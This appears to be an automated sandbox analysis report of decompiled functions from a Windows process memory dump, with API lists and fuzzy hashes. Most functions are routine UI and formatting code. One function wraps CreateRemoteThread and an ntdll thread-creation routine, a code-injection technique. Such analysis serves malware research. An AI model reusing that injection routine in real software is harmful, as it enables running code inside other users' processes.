                                                                                                                Similarity
                                                                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2754987064-0
                                                                                                                • Opcode ID: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                                                                • Instruction ID: b20814eff52bbcc052d034fa9df9783175f47b69a9638c3bed99c582471ba408
                                                                                                                • Opcode Fuzzy Hash: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                                                                • Instruction Fuzzy Hash: E7F0FFB740022CBEEB05A7949DC9DDB776CDB08358F0001B6B715E2192D6749E448BA8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00408DC8(void** __eax, struct HWND__* _a4) {
                                                                                                                				int _t7;
                                                                                                                				void** _t11;
                                                                                                                
                                                                                                                				_t11 = __eax;
                                                                                                                				if( *0x4101b4 == 0) {
                                                                                                                					memcpy(0x40f5c8,  *__eax, 0x50);
                                                                                                                					memcpy(0x40f2f8,  *(_t11 + 4), 0x2cc);
                                                                                                                					 *0x4101b4 = 1;
                                                                                                                					_t7 = DialogBoxParamW(GetModuleHandleW(0), 0x6b, _a4, E00408ADB, 0);
                                                                                                                					 *0x4101b4 =  *0x4101b4 & 0x00000000;
                                                                                                                					 *0x40f2f4 = _t7;
                                                                                                                					return 1;
                                                                                                                				} else {
                                                                                                                					return 1;
                                                                                                                				}
                                                                                                                			}






                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$DialogHandleModuleParam
                                                                                                                • String ID:
                                                                                                                • API String ID: 1386444988-0
                                                                                                                • Opcode ID: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                                                                • Instruction ID: 2efff09082e6186f10957894d43819ba35d003f4fc085d6afb87634920226402
                                                                                                                • Opcode Fuzzy Hash: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                                                                • Instruction Fuzzy Hash: FAF08231695310BBD7206BA4BE0AB473AA0D700B16F2484BEF241B54E0C7FA04559BDC
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004050E1(wchar_t* __edi, wchar_t* _a4) {
                                                                                                                				int _t10;
                                                                                                                				int _t12;
                                                                                                                				void* _t23;
                                                                                                                				wchar_t* _t24;
                                                                                                                				signed int _t25;
                                                                                                                
                                                                                                                				_t24 = __edi;
                                                                                                                				_t25 = wcslen(__edi);
                                                                                                                				_t10 = wcslen(_a4);
                                                                                                                				_t23 = _t10 + _t25;
                                                                                                                				if(_t23 >= 0x3ff) {
                                                                                                                					_t12 = _t10 - _t23 + 0x3ff;
                                                                                                                					if(_t12 > 0) {
                                                                                                                						wcsncat(__edi + _t25 * 2, _a4, _t12);
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					wcscat(__edi + _t25 * 2, _a4);
                                                                                                                				}
                                                                                                                				return _t24;
                                                                                                                			}









                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: wcslen$wcscatwcsncat
                                                                                                                • String ID:
                                                                                                                • API String ID: 291873006-0
                                                                                                                • Opcode ID: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                                                                • Instruction ID: d151cadb35ebc04527c95d650d15a6f00d765f1fde14687ca002c1c28d544fc6
                                                                                                                • Opcode Fuzzy Hash: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                                                                • Instruction Fuzzy Hash: 3CE0EC36908703AECB042625AC45C6F375DEF84368B50843FF410E6192EF3DD51556DD
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00402DDD(struct HWND__* __eax, void* __ecx) {
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				struct HWND__* _t11;
                                                                                                                				struct HWND__* _t14;
                                                                                                                				struct HWND__* _t15;
                                                                                                                				void* _t16;
                                                                                                                
                                                                                                                				_t14 = __eax;
                                                                                                                				_t16 = __ecx;
                                                                                                                				 *((intOrPtr*)(__ecx + 0x10)) = __eax;
                                                                                                                				GetClientRect(__eax, __ecx + 0xa14);
                                                                                                                				 *(_t16 + 0xa24) =  *(_t16 + 0xa24) & 0x00000000;
                                                                                                                				_t15 = GetWindow(GetWindow(_t14, 5), 0);
                                                                                                                				do {
                                                                                                                					E00402D99(_t15, _t16);
                                                                                                                					_t11 = GetWindow(_t15, 2);
                                                                                                                					_t15 = _t11;
                                                                                                                				} while (_t15 != 0);
                                                                                                                				return _t11;
                                                                                                                			}









                                                                                                                APIs
                                                                                                                • GetClientRect.USER32 ref: 00402DEF
                                                                                                                • GetWindow.USER32(?,00000005), ref: 00402E07
                                                                                                                • GetWindow.USER32(00000000), ref: 00402E0A
                                                                                                                  • Part of subcall function 00402D99: GetWindowRect.USER32 ref: 00402DA8
                                                                                                                  • Part of subcall function 00402D99: MapWindowPoints.USER32 ref: 00402DC3
                                                                                                                • GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rect$ClientPoints
                                                                                                                • String ID:
                                                                                                                • API String ID: 4235085887-0
                                                                                                                • Opcode ID: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                                                                • Instruction ID: 77c271d885eafffee951e9f606c1c6e1ef1898ae553cc6e200c9330dee891b18
                                                                                                                • Opcode Fuzzy Hash: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                                                                • Instruction Fuzzy Hash: B8E092722407006BE22197398DC9FABB2EC9FC9761F11053EF504E7280DBB8DC014669
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 72%
                                                                                                                			E0040B6A6() {
                                                                                                                				intOrPtr _t1;
                                                                                                                				intOrPtr _t2;
                                                                                                                				intOrPtr _t3;
                                                                                                                				intOrPtr _t4;
                                                                                                                
                                                                                                                				_t1 =  *0x41c458;
                                                                                                                				if(_t1 != 0) {
                                                                                                                					_push(_t1);
                                                                                                                					L0040B272();
                                                                                                                				}
                                                                                                                				_t2 =  *0x41c460;
                                                                                                                				if(_t2 != 0) {
                                                                                                                					_push(_t2);
                                                                                                                					L0040B272();
                                                                                                                				}
                                                                                                                				_t3 =  *0x41c45c;
                                                                                                                				if(_t3 != 0) {
                                                                                                                					_push(_t3);
                                                                                                                					L0040B272();
                                                                                                                				}
                                                                                                                				_t4 =  *0x41c464;
                                                                                                                				if(_t4 != 0) {
                                                                                                                					_push(_t4);
                                                                                                                					L0040B272();
                                                                                                                					return _t4;
                                                                                                                				}
                                                                                                                				return _t4;
                                                                                                                			}







                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 613200358-0
                                                                                                                • Opcode ID: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                                                                • Instruction ID: 3bd5cb9a150004800b4bedd87e83f43d671674f7d7a0a5890c52a9af046e0154
                                                                                                                • Opcode Fuzzy Hash: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                                                                • Instruction Fuzzy Hash: 96E00261B8820196DD249A7AACD5D6B239C9A05794314847EF804E72E5DF39D44045ED
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 75%
                                                                                                                			E00407362(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				void* _v16;
                                                                                                                				wchar_t* _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				char _v36;
                                                                                                                				void* __edi;
                                                                                                                				signed int _t39;
                                                                                                                				wchar_t* _t41;
                                                                                                                				signed int _t45;
                                                                                                                				signed int _t48;
                                                                                                                				wchar_t* _t53;
                                                                                                                				wchar_t* _t62;
                                                                                                                				void* _t66;
                                                                                                                				intOrPtr* _t68;
                                                                                                                				void* _t70;
                                                                                                                				wchar_t* _t75;
                                                                                                                				wchar_t* _t79;
                                                                                                                
                                                                                                                				_t66 = __ebx;
                                                                                                                				_t75 = 0;
                                                                                                                				_v8 = 0;
                                                                                                                				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
                                                                                                                					do {
                                                                                                                						_t39 =  *( *((intOrPtr*)(_t66 + 0x30)) + _v8 * 4);
                                                                                                                						_t68 = _a8;
                                                                                                                						if(_t68 != _t75) {
                                                                                                                							_t79 =  *((intOrPtr*)( *_t68))(_t39,  *((intOrPtr*)(_t66 + 0x60)));
                                                                                                                						} else {
                                                                                                                							_t79 =  *( *((intOrPtr*)(_t66 + 0x2d4)) + 0x10 + _t39 * 0x14);
                                                                                                                						}
                                                                                                                						_t41 = wcschr(_t79, 0x2c);
                                                                                                                						_pop(_t70);
                                                                                                                						if(_t41 != 0) {
                                                                                                                							L8:
                                                                                                                							_v20 = _t75;
                                                                                                                							_v28 = _t75;
                                                                                                                							_v36 = _t75;
                                                                                                                							_v24 = 0x100;
                                                                                                                							_v32 = 1;
                                                                                                                							_v16 = 0x22;
                                                                                                                							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
                                                                                                                							while(1) {
                                                                                                                								_t45 =  *_t79 & 0x0000ffff;
                                                                                                                								__eflags = _t45;
                                                                                                                								_v12 = _t45;
                                                                                                                								_t77 =  &_v36;
                                                                                                                								if(__eflags == 0) {
                                                                                                                									break;
                                                                                                                								}
                                                                                                                								__eflags = _t45 - 0x22;
                                                                                                                								if(__eflags != 0) {
                                                                                                                									_push( &_v12);
                                                                                                                									_t48 = 1;
                                                                                                                									__eflags = 1;
                                                                                                                								} else {
                                                                                                                									_push(L"\"\"");
                                                                                                                									_t48 = _t45 | 0xffffffff;
                                                                                                                								}
                                                                                                                								E0040565D(_t48, _t70, _t77, __eflags);
                                                                                                                								_t79 =  &(_t79[0]);
                                                                                                                								__eflags = _t79;
                                                                                                                							}
                                                                                                                							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
                                                                                                                							_t53 = _v20;
                                                                                                                							__eflags = _t53;
                                                                                                                							if(_t53 == 0) {
                                                                                                                								_t53 = 0x40c4e8;
                                                                                                                							}
                                                                                                                							E004055D1(E00407343(_t66, _a4, _t53),  &_v36);
                                                                                                                							_t75 = 0;
                                                                                                                							__eflags = 0;
                                                                                                                						} else {
                                                                                                                							_t62 = wcschr(_t79, 0x22);
                                                                                                                							_pop(_t70);
                                                                                                                							if(_t62 != 0) {
                                                                                                                								goto L8;
                                                                                                                							} else {
                                                                                                                								E00407343(_t66, _a4, _t79);
                                                                                                                							}
                                                                                                                						}
                                                                                                                						if(_v8 <  *((intOrPtr*)(_t66 + 0x2c)) - 1) {
                                                                                                                							E00407343(_t66, _a4, ",");
                                                                                                                						}
                                                                                                                						_v8 = _v8 + 1;
                                                                                                                					} while (_v8 <  *((intOrPtr*)(_t66 + 0x2c)));
                                                                                                                				}
                                                                                                                				return E00407343(_t66, _a4, L"\r\n");
                                                                                                                			}

                                                                                                                APIs
                                                                                                                • wcschr.MSVCRT ref: 004073A4
                                                                                                                • wcschr.MSVCRT ref: 004073B2
                                                                                                                  • Part of subcall function 0040565D: wcslen.MSVCRT ref: 00405679
                                                                                                                  • Part of subcall function 0040565D: memcpy.MSVCRT ref: 0040569D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: wcschr$memcpywcslen
                                                                                                                • String ID: "
                                                                                                                • API String ID: 1983396471-123907689
                                                                                                                • Opcode ID: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                                                                • Instruction ID: 00b3f0686b04e7c82e40785714242b478475f00d1c6093d835cc4068bab83974
                                                                                                                • Opcode Fuzzy Hash: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                                                                • Instruction Fuzzy Hash: 4E315F31E04208ABDF10EFA5C8819AE7BB9EF54314F20457BEC50B72C2D778AA41DB59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 64%
                                                                                                                			E0040A272(struct HINSTANCE__** __eax, void* _a4, _Unknown_base(*)()* _a8, void* _a12, DWORD* _a16) {
                                                                                                                				void* _v8;
                                                                                                                				char _v12;
                                                                                                                				char* _v20;
                                                                                                                				long _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				char* _v36;
                                                                                                                				signed int _v40;
                                                                                                                				void _v44;
                                                                                                                				char _v48;
                                                                                                                				char _v52;
                                                                                                                				struct _OSVERSIONINFOW _v328;
                                                                                                                				void* __esi;
                                                                                                                				signed int _t40;
                                                                                                                				intOrPtr* _t44;
                                                                                                                				void* _t49;
                                                                                                                				struct HINSTANCE__** _t54;
                                                                                                                				signed int _t55;
                                                                                                                
                                                                                                                				_t54 = __eax;
                                                                                                                				_v328.dwOSVersionInfoSize = 0x114;
                                                                                                                				GetVersionExW( &_v328);
                                                                                                                				if(_v328.dwMajorVersion < 6) {
                                                                                                                					return CreateRemoteThread(_a4, 0, 0, _a8, _a12, 4, _a16);
                                                                                                                				}
                                                                                                                				E0040A1EF(_t54);
                                                                                                                				_t44 =  *((intOrPtr*)(_t54 + 4));
                                                                                                                				if(_t44 != 0) {
                                                                                                                					_t55 = 8;
                                                                                                                					memset( &_v44, 0, _t55 << 2);
                                                                                                                					_v12 = 0;
                                                                                                                					asm("stosd");
                                                                                                                					_v36 =  &_v12;
                                                                                                                					_v20 =  &_v52;
                                                                                                                					_v48 = 0x24;
                                                                                                                					_v44 = 0x10003;
                                                                                                                					_v40 = _t55;
                                                                                                                					_v28 = 0x10004;
                                                                                                                					_v24 = 4;
                                                                                                                					_a16 = 0;
                                                                                                                					_t40 =  *_t44( &_a16, 0x1fffff, 0, _a4, _a8, _a12, 1, 0, 0, 0,  &_v48, _t49);
                                                                                                                					asm("sbb eax, eax");
                                                                                                                					return  !( ~_t40) & _a16;
                                                                                                                				}
                                                                                                                				return 0;
                                                                                                                			}

                                                                                                                APIs
                                                                                                                • GetVersionExW.KERNEL32(?,73B768A0,00000000), ref: 0040A290
                                                                                                                • CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000004,?), ref: 0040A32F
                                                                                                                  • Part of subcall function 0040A1EF: LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                                                                  • Part of subcall function 0040A1EF: GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressCreateLibraryLoadProcRemoteThreadVersion
                                                                                                                • String ID: $
                                                                                                                • API String ID: 283512611-3993045852
                                                                                                                • Opcode ID: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                                                                • Instruction ID: f7bb912936b7b9019fec647a10c74351ea71fc4cb5320a39ef1905a9d188216f
                                                                                                                • Opcode Fuzzy Hash: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                                                                • Instruction Fuzzy Hash: CC216DB290020DEFDF11CF94DD44AEE7BB9FB88704F00802AFA05B6190D7B59A54CBA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 45%
                                                                                                                			E00401676(void* __ecx, intOrPtr* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                				char _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				char _v80;
                                                                                                                				signed short _v65616;
                                                                                                                				void* _t27;
                                                                                                                				intOrPtr _t28;
                                                                                                                				void* _t34;
                                                                                                                				intOrPtr _t39;
                                                                                                                				intOrPtr* _t51;
                                                                                                                				void* _t52;
                                                                                                                
                                                                                                                				_t51 = __esi;
                                                                                                                				E0040B550(0x1004c, __ecx);
                                                                                                                				_t39 = 0;
                                                                                                                				_push(0);
                                                                                                                				_push( &_v8);
                                                                                                                				_v8 =  *((intOrPtr*)(_a4 + 0x1c));
                                                                                                                				_push(L"Lines");
                                                                                                                				_t27 =  *((intOrPtr*)( *__esi))();
                                                                                                                				if(_v8 > 0) {
                                                                                                                					do {
                                                                                                                						_t6 = _t39 + 1; // 0x1
                                                                                                                						_t28 = _t6;
                                                                                                                						_push(_t28);
                                                                                                                						_push(L"Line%d");
                                                                                                                						_v12 = _t28;
                                                                                                                						_push(0x1f);
                                                                                                                						_push( &_v80);
                                                                                                                						L0040B1EC();
                                                                                                                						_t52 = _t52 + 0x10;
                                                                                                                						_push(0x7fff);
                                                                                                                						_push(0x40c4e8);
                                                                                                                						if( *((intOrPtr*)(_t51 + 4)) == 0) {
                                                                                                                							_v65616 = _v65616 & 0x00000000;
                                                                                                                							 *((intOrPtr*)( *_t51 + 0x10))( &_v80,  &_v65616);
                                                                                                                							_t34 = E004054DF(_a4, _t51,  &_v65616);
                                                                                                                						} else {
                                                                                                                							_t34 =  *((intOrPtr*)( *_t51 + 0x10))( &_v80, E00405581(_a4, _t39));
                                                                                                                						}
                                                                                                                						_t39 = _v12;
                                                                                                                					} while (_t39 < _v8);
                                                                                                                					return _t34;
                                                                                                                				}
                                                                                                                				return _t27;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintf
                                                                                                                • String ID: Line%d$Lines
                                                                                                                • API String ID: 3988819677-2790224864
                                                                                                                • Opcode ID: 85c35154c4290c7e71ee3589cd3dab7edefba6c8c670df13eed484ab7778891e
                                                                                                                • Instruction ID: 1021665491e9d2d06496d958327cd8fefc515fbb55266dd5f91e98284186a054
                                                                                                                • Opcode Fuzzy Hash: 85c35154c4290c7e71ee3589cd3dab7edefba6c8c670df13eed484ab7778891e
                                                                                                                • Instruction Fuzzy Hash: 4C110071A00208EFCB15DF98C8C1D9EB7B9EF48704F1045BAF645E7281D778AA458B68
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 70%
                                                                                                                			E0040512F(intOrPtr _a4, intOrPtr _a8, void* _a12) {
                                                                                                                				void* _v8;
                                                                                                                				void* _v26;
                                                                                                                				void _v28;
                                                                                                                				void* _t24;
                                                                                                                				void* _t25;
                                                                                                                				void* _t35;
                                                                                                                				signed int _t38;
                                                                                                                				signed int _t42;
                                                                                                                				void* _t44;
                                                                                                                				void* _t45;
                                                                                                                
                                                                                                                				_t24 = _a12;
                                                                                                                				_t45 = _t44 - 0x18;
                                                                                                                				_t42 = 0;
                                                                                                                				 *_t24 = 0;
                                                                                                                				if(_a8 <= 0) {
                                                                                                                					_t25 = 0;
                                                                                                                				} else {
                                                                                                                					_t38 = 0;
                                                                                                                					_t35 = 0;
                                                                                                                					if(_a8 > 0) {
                                                                                                                						_v8 = _t24;
                                                                                                                						while(1) {
                                                                                                                							_v28 = _v28 & 0x00000000;
                                                                                                                							asm("stosd");
                                                                                                                							asm("stosd");
                                                                                                                							asm("stosd");
                                                                                                                							asm("stosd");
                                                                                                                							asm("stosw");
                                                                                                                							_push( *(_t35 + _a4) & 0x000000ff);
                                                                                                                							_push(L"%2.2X ");
                                                                                                                							_push(0xa);
                                                                                                                							_push( &_v28);
                                                                                                                							L0040B1EC();
                                                                                                                							_t38 = _t42;
                                                                                                                							memcpy(_v8,  &_v28, 6);
                                                                                                                							_t13 = _t42 + 3; // 0x3
                                                                                                                							_t45 = _t45 + 0x1c;
                                                                                                                							if(_t13 >= 0x2000) {
                                                                                                                								break;
                                                                                                                							}
                                                                                                                							_v8 = _v8 + 6;
                                                                                                                							_t35 = _t35 + 1;
                                                                                                                							_t42 = _t42 + 3;
                                                                                                                							if(_t35 < _a8) {
                                                                                                                								continue;
                                                                                                                							}
                                                                                                                							break;
                                                                                                                						}
                                                                                                                						_t24 = _a12;
                                                                                                                					}
                                                                                                                					 *(_t24 + 4 + _t38 * 2) =  *(_t24 + 4 + _t38 * 2) & 0x00000000;
                                                                                                                					_t25 = 1;
                                                                                                                				}
                                                                                                                				return _t25;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintfmemcpy
                                                                                                                • String ID: %2.2X
                                                                                                                • API String ID: 2789212964-323797159
                                                                                                                • Opcode ID: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                                                                • Instruction ID: b76e4bbe2d26c53343c630e3245d096d82678977124e835a89109146ed91de65
                                                                                                                • Opcode Fuzzy Hash: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                                                                • Instruction Fuzzy Hash: 5A11A532900608BFEB01DFE8C882AAF77B9FB45314F104477ED14EB141D6789A058BD5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 43%
                                                                                                                			E004075BB(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                				char _v44;
                                                                                                                				intOrPtr _t22;
                                                                                                                				signed int _t30;
                                                                                                                				signed int _t34;
                                                                                                                				void* _t35;
                                                                                                                				void* _t36;
                                                                                                                
                                                                                                                				_t35 = __esi;
                                                                                                                				_t34 = 0;
                                                                                                                				if( *((intOrPtr*)(__esi + 0x2c)) > 0) {
                                                                                                                					do {
                                                                                                                						_t30 =  *( *((intOrPtr*)(__esi + 0x30)) + _t34 * 4);
                                                                                                                						_t22 =  *((intOrPtr*)(_t30 * 0x14 +  *((intOrPtr*)(__esi + 0x40)) + 0xc));
                                                                                                                						L0040B1EC();
                                                                                                                						_push( *((intOrPtr*)( *_a8))(_t30,  *((intOrPtr*)(__esi + 0x64)),  &_v44, 0x14, L"%%-%d.%ds ", _t22, _t22));
                                                                                                                						_push( &_v44);
                                                                                                                						_push(0x2000);
                                                                                                                						_push( *((intOrPtr*)(__esi + 0x60)));
                                                                                                                						L0040B1EC();
                                                                                                                						_t36 = _t36 + 0x24;
                                                                                                                						E00407343(__esi, _a4,  *((intOrPtr*)(__esi + 0x60)));
                                                                                                                						_t34 = _t34 + 1;
                                                                                                                					} while (_t34 <  *((intOrPtr*)(__esi + 0x2c)));
                                                                                                                				}
                                                                                                                				return E00407343(_t35, _a4, L"\r\n");
                                                                                                                			}










                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintf
                                                                                                                • String ID: %%-%d.%ds
                                                                                                                • API String ID: 3988819677-2008345750
                                                                                                                • Opcode ID: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                                                                • Instruction ID: ecb877ded915dbad8d5af0e436ed4e240226c92ce5a1c47ab2288d53f8dcf9da
                                                                                                                • Opcode Fuzzy Hash: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                                                                • Instruction Fuzzy Hash: BC01B931600704AFD7109F69CC82D5A77ADFF48304B004439FD86B7292D635F911DBA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0040507A(intOrPtr __eax, wchar_t* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                				intOrPtr _v20;
                                                                                                                				intOrPtr _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				intOrPtr _v36;
                                                                                                                				intOrPtr _v44;
                                                                                                                				intOrPtr _v48;
                                                                                                                				wchar_t* _v52;
                                                                                                                				intOrPtr _v56;
                                                                                                                				intOrPtr _v64;
                                                                                                                				intOrPtr _v68;
                                                                                                                				intOrPtr _v76;
                                                                                                                				struct tagOFNA _v80;
                                                                                                                
                                                                                                                				_v76 = __eax;
                                                                                                                				_v68 = _a4;
                                                                                                                				_v64 = 0;
                                                                                                                				_v44 = 0;
                                                                                                                				_v36 = 0;
                                                                                                                				_v32 = _a8;
                                                                                                                				_v20 = _a12;
                                                                                                                				_v80 = 0x4c;
                                                                                                                				_v56 = 1;
                                                                                                                				_v52 = __esi;
                                                                                                                				_v48 = 0x104;
                                                                                                                				_v28 = 0x81804;
                                                                                                                				if(GetOpenFileNameW( &_v80) == 0) {
                                                                                                                					return 0;
                                                                                                                				} else {
                                                                                                                					wcscpy(__esi, _v52);
                                                                                                                					return 1;
                                                                                                                				}
                                                                                                                			}

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
